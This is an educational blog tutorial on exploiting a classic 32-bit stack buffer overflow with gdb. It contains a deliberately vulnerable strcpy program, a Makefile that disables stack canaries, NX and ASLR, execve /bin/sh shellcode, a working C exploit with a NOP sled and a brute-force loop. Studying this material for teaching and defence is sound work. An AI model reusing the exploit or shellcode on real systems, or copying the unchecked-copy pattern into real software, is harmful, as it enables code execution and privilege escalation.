Buffer 0verfl0w


Posted on August, 2017

A buffer overflow is a bug that occurs when a program writes past the end of an allocated buffer. When this happens, the data stored next to the buffer (other variables, saved registers, return addresses) is overwritten and the behaviour of the program becomes unpredictable. This kind of bug can be exploited to violate the security policy of a system: for instance, it can allow an attacker to get a shell and gain elevated privileges. In C, functions like “gets” (which reads a line from the standard input stream) and “strcpy” (which copies a string) write their input into a buffer. These functions are dangerous because they do not check whether the input fits within the destination buffer.

Let's explore how a function call works and how we can exploit it!

Here is the vulnerable code that we will look into.

#include <stdio.h>
#include <string.h>

void vuln(char *buf){

	char buffer[32];
	strcpy(buffer, buf);	/* no length check: buf may be longer than buffer */
}

int main(int argc, char **argv){

	printf("NIOUAH\n");
	vuln(argv[1]);
	printf("No Overflow...\n");

	return 0;
}

This code is very simple: first the main function calls the vuln function with the argument argv[1]. Then the vuln function copies argv[1] into a local buffer and returns. Now let's use gdb to look at the behaviour of this program.

reglisse@debian:~/Documents/security/BOF$ gdb -q vuln
Reading symbols from vuln...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
   0x08048445 <+0>:	lea    0x4(%esp),%ecx
   0x08048449 <+4>:	and    $0xfffffff0,%esp
   0x0804844c <+7>:	pushl  -0x4(%ecx)
   0x0804844f <+10>:	push   %ebp
   0x08048450 <+11>:	mov    %esp,%ebp
   0x08048452 <+13>:	push   %ebx
   0x08048453 <+14>:	push   %ecx
   0x08048454 <+15>:	mov    %ecx,%ebx
   0x08048456 <+17>:	sub    $0xc,%esp
   0x08048459 <+20>:	push   $0x8048530
   0x0804845e <+25>:	call   0x8048300 <puts@plt>
   0x08048463 <+30>:	add    $0x10,%esp
   0x08048466 <+33>:	mov    0x4(%ebx),%eax
   0x08048469 <+36>:	add    $0x4,%eax
   0x0804846c <+39>:	mov    (%eax),%eax
   0x0804846e <+41>:	sub    $0xc,%esp
   0x08048471 <+44>:	push   %eax
   0x08048472 <+45>:	call   0x804842b <vuln>
   0x08048477 <+50>:	add    $0x10,%esp
   0x0804847a <+53>:	sub    $0xc,%esp
   0x0804847d <+56>:	push   $0x8048537
   0x08048482 <+61>:	call   0x8048300 <puts@plt>
   0x08048487 <+66>:	add    $0x10,%esp
   0x0804848a <+69>:	mov    $0x0,%eax
   0x0804848f <+74>:	lea    -0x8(%ebp),%esp
   0x08048492 <+77>:	pop    %ecx
   0x08048493 <+78>:	pop    %ebx
   0x08048494 <+79>:	pop    %ebp
   0x08048495 <+80>:	lea    -0x4(%ecx),%esp
---Type <return> to continue, or q <return> to quit---
   0x08048498 <+83>:	ret
End of assembler dump.
(gdb)

At main+25 you can see that the puts function is called (the compiler replaced the printf call with puts because the string is a constant ending in a newline), then at main+45 the function vuln is called.

(gdb) disas vuln
Dump of assembler code for function vuln:
   0x0804842b <+0>:	push   %ebp
   0x0804842c <+1>:	mov    %esp,%ebp
   0x0804842e <+3>:	sub    $0x28,%esp
   0x08048431 <+6>:	sub    $0x8,%esp
   0x08048434 <+9>:	pushl  0x8(%ebp)
   0x08048437 <+12>:	lea    -0x28(%ebp),%eax
   0x0804843a <+15>:	push   %eax
   0x0804843b <+16>:	call   0x80482f0 <strcpy@plt>
   0x08048440 <+21>:	add    $0x10,%esp
   0x08048443 <+24>:	leave
   0x08048444 <+25>:	ret
End of assembler dump.
(gdb)

We can also see in the vuln function that the strcpy function is called. So let's put a breakpoint at the beginning of the vuln function.

(gdb) set disassembly-flavor intel
(gdb) b *vuln
Breakpoint 1 at 0x804842b
(gdb) r AAAA
Starting program: /home/reglisse/Documents/security/BOF/vuln AAAA
NIOUAH

Breakpoint 1, 0x0804842b in vuln ()
(gdb)

Now if we explore the stack we can see some values:

(gdb) x/10wx $sp
0xffffd39c:	0x08048477	0xffffd5fb	0xffffd464	0xffffd470
0xffffd3ac:	0xf7e403fd	0xffffd3d0	0xf7fb8000	0x00000000
0xffffd3bc:	0xf7e28a63	0x080484a0

At the top of the stack, the value 0x08048477 is the return address of the vuln function: it is the address of the instruction at main+50, which will be executed after the vuln function returns.

If we continue the execution we can see that the frame pointer is pushed (saved) on the stack at vuln+0. At vuln+1 the stack pointer is copied into the frame pointer in order to create a new stack frame for the vuln function. Then at vuln+3 and vuln+6 the stack pointer is decreased (by 0x28 and 0x8 bytes) to reserve stack space for the vuln function.

=> 0x0804842b <+0>:	push   ebp
   0x0804842c <+1>:	mov    ebp,esp
   0x0804842e <+3>:	sub    esp,0x28
   0x08048431 <+6>:	sub    esp,0x8
   0x08048434 <+9>:	push   DWORD PTR [ebp+0x8]
   0x08048437 <+12>:	lea    eax,[ebp-0x28]
   0x0804843a <+15>:	push   eax
   0x0804843b <+16>:	call   0x80482f0 <strcpy@plt>
   0x08048440 <+21>:	add    esp,0x10
   0x08048443 <+24>:	leave
   0x08048444 <+25>:	ret  

If we continue the execution until after the strcpy call, we can see our AAAA value (0x41414141 in hexadecimal) on the stack at address 0xffffd370:

(gdb) b *vuln+21
Breakpoint 3 at 0x8048440
(gdb) c
Continuing.

Breakpoint 3, 0x08048440 in vuln ()
(gdb) x/10wx $sp
0xffffd360:	0xffffd370	0xffffd5fb	0x00000006	0xf7e73ee4
0xffffd370:	0x41414141	0x00000000	0x00000006	0xf7e0e700
0xffffd380:	0xffffd3b8	0xf7ff0b70
(gdb)
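
The addresses in the two stack dumps above can be cross-checked by replaying the prologue of vuln by hand. The following is only a sketch in Python: the constant and function names are mine, the addresses come from this particular gdb session, and the 5-byte length of the call instruction is read off the listing (main+45 to main+50).

```python
# Replays the stack-pointer arithmetic of vuln's prologue using the
# addresses from the gdb session (they are specific to that run).

ESP_AT_ENTRY = 0xFFFFD39C   # $sp at breakpoint 1; this slot holds the return address
CALL_SITE = 0x08048472      # address of the call to vuln at main+45
CALL_LENGTH = 5             # the next instruction is at main+50

def replay_prologue(esp):
    """Return (ebp, buffer_address, esp_after_pushing_strcpy_args)."""
    esp -= 4                      # push ebp
    ebp = esp                     # mov ebp, esp
    esp -= 0x28                   # sub esp, 0x28
    esp -= 0x8                    # sub esp, 0x8
    esp -= 4                      # push DWORD PTR [ebp+0x8]  (source pointer)
    buffer_address = ebp - 0x28   # lea eax, [ebp-0x28]
    esp -= 4                      # push eax                  (destination pointer)
    return ebp, buffer_address, esp

ebp, buffer_address, esp = replay_prologue(ESP_AT_ENTRY)
return_address = CALL_SITE + CALL_LENGTH

print(hex(return_address))  # 0x8048477
print(hex(ebp))             # 0xffffd398
print(hex(buffer_address))  # 0xffffd370
print(hex(esp))             # 0xffffd360
```

The last two values match the dump taken at vuln+21: the stack pointer is 0xffffd360 and the first word on the stack is the destination pointer 0xffffd370, where the "AAAA" bytes were written.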

Now what happens if we enter more characters than the buffer can contain?

(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/reglisse/Documents/security/BOF/vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
NIOUAH

Breakpoint 1, 0x0804842b in vuln ()
(gdb) c
Continuing.

Breakpoint 3, 0x08048440 in vuln ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

We can see that the program crashes because some "A" characters overwrote a special address on the stack: the program tried to jump to 0x41414141. The state of the stack after a function call can be summarized as follows.

From higher to lower addresses, there are first the function arguments, then the return address and then the old frame pointer. Below them, the local variables of the function are placed on the stack (integers, buffers...). Since strcpy writes towards higher addresses, it is now clear that if we enter too many characters in the buffer we will overwrite values on the stack such as the saved frame pointer and the return address.
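
To make this layout concrete, here is a small Python model of the part of the frame that goes from the buffer up to the return address. It is a sketch under assumptions, not a trace of the real process: the function names are mine, the saved frame pointer value is purely illustrative, and only the distance 0x28 and the return address 0x08048477 are taken from the gdb session.

```python
import struct

BUFFER_TO_SAVED_EBP = 0x28     # the buffer starts at ebp-0x28 in vuln
SAVED_EBP = 0xFFFFD3B8         # illustrative value only (assumption)
RETURN_ADDRESS = 0x08048477    # main+50, taken from the gdb session

def make_frame():
    """Model the frame from the start of the buffer up to the return address."""
    frame = bytearray(BUFFER_TO_SAVED_EBP)        # local variables, zeroed
    frame += struct.pack("<I", SAVED_EBP)         # saved frame pointer
    frame += struct.pack("<I", RETURN_ADDRESS)    # return address
    return frame

def unchecked_copy(frame, data):
    """Mimic strcpy: copy every byte plus a NUL, with no length check."""
    data = data + b"\x00"
    frame[0:len(data)] = data
    return frame

def return_address(frame):
    """Read the 32-bit little-endian word stored in the return address slot."""
    return struct.unpack_from("<I", frame, BUFFER_TO_SAVED_EBP + 4)[0]

short = unchecked_copy(make_frame(), b"AAAA")
long_input = unchecked_copy(make_frame(), b"A" * 48)

print(hex(return_address(short)))       # 0x8048477
print(hex(return_address(long_input)))  # 0x41414141
```

With 4 characters the return address is untouched; with 48 characters it becomes 0x41414141, the address reported in the segmentation fault.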

So, in order to exploit this program, we will redirect the execution flow to code that executes what we want. This takes two steps: first we inject a shellcode (machine code) into the buffer, then we overflow the buffer and modify the return address of the vuln function so that it points to our shellcode.

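Let's practice! In order to reach the return address of the vuln function we must inject 44 bytes: 40 bytes (0x28) from the start of the buffer to the saved frame pointer, plus 4 bytes for the saved frame pointer itself.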

(gdb) r $(python -c 'print("A"*44 + "B"*4)')
Starting program: /home/reglisse/Documents/security/BOF/vuln $(python -c 'print("A"*44 + "B"*4)')
NIOUAH

Breakpoint 1, 0x0804842b in vuln ()
(gdb) c
Continuing.

Breakpoint 3, 0x08048440 in vuln ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

We can see that the program crashes at address 0x42424242, which is "BBBB", so we must replace "BBBB" with the address of our shellcode.
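
The 44-byte offset and the byte order of the injected address can be checked with a short Python sketch. The helper name build_payload is hypothetical, and the sketch assumes a 32-bit little-endian target, as in the gdb session.

```python
import struct

BUFFER_OFFSET_FROM_EBP = 0x28   # lea eax,[ebp-0x28] in vuln
SAVED_EBP_SIZE = 4              # one 32-bit word pushed at vuln+0
OFFSET_TO_RETURN_ADDRESS = BUFFER_OFFSET_FROM_EBP + SAVED_EBP_SIZE

def build_payload(return_address, filler=b"A"):
    """Filler up to the return address, then the address in little-endian."""
    packed = struct.pack("<I", return_address)
    if b"\x00" in packed:
        # argv strings cannot contain NUL bytes
        raise ValueError("the address contains a NUL byte")
    return filler * OFFSET_TO_RETURN_ADDRESS + packed

print(OFFSET_TO_RETURN_ADDRESS)                               # 44
print(build_payload(0x42424242) == b"A" * 44 + b"BBBB")       # True
print(build_payload(0xFFFFD370)[-4:] == b"\x70\xd3\xff\xff")  # True
```

Because x86 is little-endian, the address bytes appear in reverse order in the payload: 0xffffd370 is written as 70 d3 ff ff.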

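In order to do this exercise we must disable some Linux protections: the stack protector (canary), the non-executable stack and address space layout randomization (ASLR). We will see later how to bypass them. Here is my Makefile: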

all:
	gcc -m32 -fno-stack-protector -z execstack -o vuln vuln.c
	gcc -m32 -z execstack -o sc shellcode.c
	echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Let's write the exploit. First we put our shellcode in the environment:

reglisse@debian:~/Documents/security$ export SHELLCODE=$(python -c 'print("\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x45\x54\x45\x48\x41\x43\x4b\x4b\x66\x90\x66\x90\x66\x90\x66\x90\x66\x90\x66\x90\x66\x90\x90")' )

Then, with this code, we determine the address where the shellcode will be located when the vuln program runs:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char**argv){
        char *ptr;

        if(argc<3){
                printf("Usage: %s <environment var> <target program name>\n", argv[0]);
                exit(0);
        }
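        ptr = getenv(argv[1]);
        if(ptr == NULL){
                printf("%s is not set\n", argv[1]);
                exit(1);
        }
        /* adjust for the difference in program name length */
        ptr += ((int)strlen(argv[0]) - (int)strlen(argv[2]))*2;
        printf("%s will be at %p\n",argv[1],(void*)ptr);

        return 0;
}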
reglisse@debian:~/Documents/security/BOF$ ./deter SHELLCODE vuln
SHELLCODE will be at 0xffffd60a
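
The adjustment made by this helper can be written as a one-line formula. The Python sketch below mirrors it; the function name is hypothetical and the factor of 2 is simply the one used in the C code (each extra character in the program name is taken to shift the environment strings by two bytes). The input 0xffffd604 is not shown in the output above: it is obtained by working backwards from the printed result, assuming the helper was invoked as ./deter.

```python
def predict_env_address(address_in_helper, helper_name, target_name):
    """Shift the address seen by the helper by twice the name length difference."""
    return address_in_helper + (len(helper_name) - len(target_name)) * 2

# "./deter" is 7 characters long and "vuln" is 4, so the shift is (7 - 4) * 2 = 6.
print(hex(predict_env_address(0xFFFFD604, "./deter", "vuln")))  # 0xffffd60a
```

The prediction only holds if the target is started under the name given as the second argument: launching it with a different path (for instance the absolute path used by gdb) changes the shift.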

Let's write the exploit:

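#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Build with gcc -m32: the code assumes 32-bit pointers and registers. */

/* Return the current value of the stack pointer. */
unsigned long getADDR(void) {
  unsigned long sp;
  __asm__ volatile("mov %%esp, %0" : "=r"(sp));
  return sp;
}

int main(int argc, char** argv) {

  unsigned long esp = getADDR();

  if (argc < 2) {
    printf("Give argument for the bruteforce\n");
    return 1;
  }

  char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
  char buffer[49];  /* 44 bytes of payload + 4-byte address + NUL */
  char* ptr = buffer;
  size_t i;

  /* NOP sled, then the shellcode, for a total of 44 bytes */
  for (i = 0; i < 44 - strlen(shellcode); i++, ptr++)
    *ptr = (char)0x90;
  for (i = 0; i < strlen(shellcode); i++, ptr++)
    *ptr = shellcode[i];

  /* Guess the return address: our own stack pointer minus an offset */
  int offset = atoi(argv[1]);
  unsigned long ret = esp - offset;
  memcpy(ptr, &ret, 4);  /* little-endian, lands on vuln's return address */
  ptr[4] = '\0';         /* execl() expects a NUL-terminated string */

  /* no newline: this stays in the stdio buffer and is lost on execl() */
  printf("Inject return address : %p", (void*)ret);

  execl("/home/reglisse/Documents/security/BOF/vuln", "vuln", buffer, NULL);
  perror("execl");       /* only reached if execl() fails */
  return 1;
}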

This exploit is simple to understand: we put the shellcode into a buffer and pad the beginning of the buffer with NOP instructions, which fill the buffer and make it easier to jump into the shellcode. The only point to explain is the getADDR() function. Because every process has its own virtual address space and ASLR is disabled, the stack of every program starts at the same address. The getADDR function gets the value of the stack pointer at the beginning of the exploit, which will probably be close to the stack pointer of the vuln program. Then we subtract an offset from this value in order to find the address of the buffer with a quick bruteforce!
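
The layout of the injected buffer, and the reason the NOPs make the bruteforce easier, can be sketched in Python. The shellcode bytes and the 44-byte offset are copied from the exploit; the function names and the payload_address parameter are assumptions made for illustration.

```python
import struct

SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
OFFSET_TO_RETURN_ADDRESS = 44
NOP = b"\x90"
SLED_LENGTH = OFFSET_TO_RETURN_ADDRESS - len(SHELLCODE)

def build_buffer(return_address):
    """NOP sled + shellcode (44 bytes), followed by the guessed return address."""
    return NOP * SLED_LENGTH + SHELLCODE + struct.pack("<I", return_address)

def reaches_shellcode(return_address, payload_address):
    """True if the guess points into the sled or at the first shellcode byte."""
    return payload_address <= return_address <= payload_address + SLED_LENGTH

print(len(SHELLCODE), SLED_LENGTH)          # 23 21
print(len(build_buffer(0xFFFFD370)))        # 48
print(reaches_shellcode(0xFFFFD370 + 10, 0xFFFFD370))  # True
print(reaches_shellcode(0xFFFFD370 + 22, 0xFFFFD370))  # False
```

Without the sled only one address would reach the first instruction of the shellcode; with 21 NOPs in front of it, 22 consecutive addresses do, so the bruteforce needs fewer attempts.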

Demo

Segmentation fault
NIOUAH
Segmentation fault
NIOUAH
Floating point exception
NIOUAH
Segmentation fault
NIOUAH
Floating point exception
NIOUAH
Segmentation fault
NIOUAH
Floating point exception
NIOUAH
Segmentation fault
NIOUAH
Segmentation fault
NIOUAH
Floating point exception
NIOUAH
Segmentation fault
NIOUAH
Floating point exception
NIOUAH
Segmentation fault
NIOUAH
$

Here is the bruteforce script:

#!/bin/sh

A=-1; while true; do A=$((A+1)); ./exploit "$A"; done

Presentation
Cyril Bresch graduated from the Grenoble Institute of Technology, Esisar school, in computer engineering. He is now a PhD student within the LCIS lab from Univ. Grenoble Alps and Grenoble Institute of Technology in Valence, France. His research interests are computer security and processor architecture security.

Second place at CSAW 2k16 NYU :)
IEEE publication : "A Red Team Blue Team approach Towards a Secure Processor Design With a Hardware Shadow Stack"

You can contact me at cyril[dot]bresch[dot]fr[at]gmail[dot]com